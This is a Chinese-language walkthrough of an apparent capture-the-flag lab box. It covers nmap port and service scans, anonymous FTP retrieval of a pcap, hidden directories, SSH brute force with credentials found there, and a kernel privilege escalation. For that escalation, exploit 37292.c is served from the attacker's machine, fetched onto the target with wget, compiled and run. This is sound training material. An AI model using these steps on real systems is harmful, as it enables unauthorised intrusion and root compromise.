
信息收集及漏洞突破端口扫描,发现开了三个端口nmap 192.168.115.0/24 -p-Nmap scan report for 192.168.115.148Host is up (0.00031s latency).Not shown: 65532 closed tcp ports (reset)PORT STATE SERVICE21/tcp open ftp22/tcp open ssh80/tcp open http服务版本信息nmap 192.168.115.148 -T4 -A -O21/tcp open ftp vsftpd 3.0.2| ftp-anon: Anonymous FTP login allowed (FTP code 230)|_-rwxrwxrwx 1 1000 0 8068 Aug 09 2014 lol.pcap [NSE: writeable]| ftp-syst:| STAT:| FTP server status:| Connected to 192.168.115.130| Logged in as ftp| TYPE: ASCII| No session bandwidth limit| Session timeout in seconds is 600| Control connection is plain text| Data connections will be plain text| At session startup, client count was 1| vsFTPd 3.0.2 - secure, fast, stable|_End of status22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)| ssh-hostkey:| 1024 d6:18:d9:ef:75:d3:1c:29:be:14:b5:2b:18:54:a9:c0 (DSA)| 2048 ee:8c:64:87:44:39:53:8c:24:fe:9d:39:a9:ad:ea:db (RSA)| 256 0e:66:e6:50:cf:56:3b:9c:67:8b:5f:56:ca:ae:6b:f4 (ECDSA)|_ 256 b2:8b:e2:46:5c:ef:fd:dc:72:f7:10:7e:04:5f:25:85 (ED25519)80/tcp open http Apache httpd 2.4.7 ((Ubuntu))|_http-title: Site doesnt have a title (text/html).|_http-server-header: Apache/2.4.7 (Ubuntu)| http-robots.txt: 1 disallowed entry|_/secret80端口下的网站以及目录扫描是一张图片21/tcp open ftp vsftpd 3.0.2| ftp-anon: Anonymous FTP login allowed (FTP code 230)提示我们ftp可以匿名登录然后登录之后发现了一个流量包把lol.pcap放了wireshark里面进行流量分析最后发现了这个sup3rs3cr3tdirlol根据提示信息这一定是一个重要线索使用这个sup3rs3cr3tdirlol 进行ssh登录ftp登录都没成功放了浏览器结果把good_luck/which_one_lol.txt的信息和/this_folder_contains_the_password/Pass.txt下的信息做为ssh 爆破的用户名和密码最后发现用户名是overflow密码居然是文件名Pass.txt(虽然有点狗但是提供了一个思路)系统提权使用ssh登录之后信息收集首先想到的是内核提权根据收集的信息kali里面搜索searchsploit Ubuntu 14.04 Privilege Linux 3.13根据收集的信息逐步缩小搜索的范围有利用做实验老方法把.c文件下载下来使用python下载到靶机在靶机编译前提条件是靶机支持下载以及gcc编译这个简单测试即可)python -m http.server 80wget http://192.168.115.130/37292.c下载到tmp目录否则提示权限不足然后gcc编译最后执行提权成功思路梳理端口扫描发现21/22/80端口。扫描服务版本号发现ftp可匿名登录。发现lol.pacp文件里面发现一个提示的字符串这个字符串到底是干啥的最后测试放浏览器目录发现一个文件啥也没有文件放linux执行发现一个字符串这个字符串又能干啥最后又发现可以在目录访问目录访问发现两个文件里面有用户名和密码最后用这里的用户名和密码爆破ssh成功。提权使用内核提权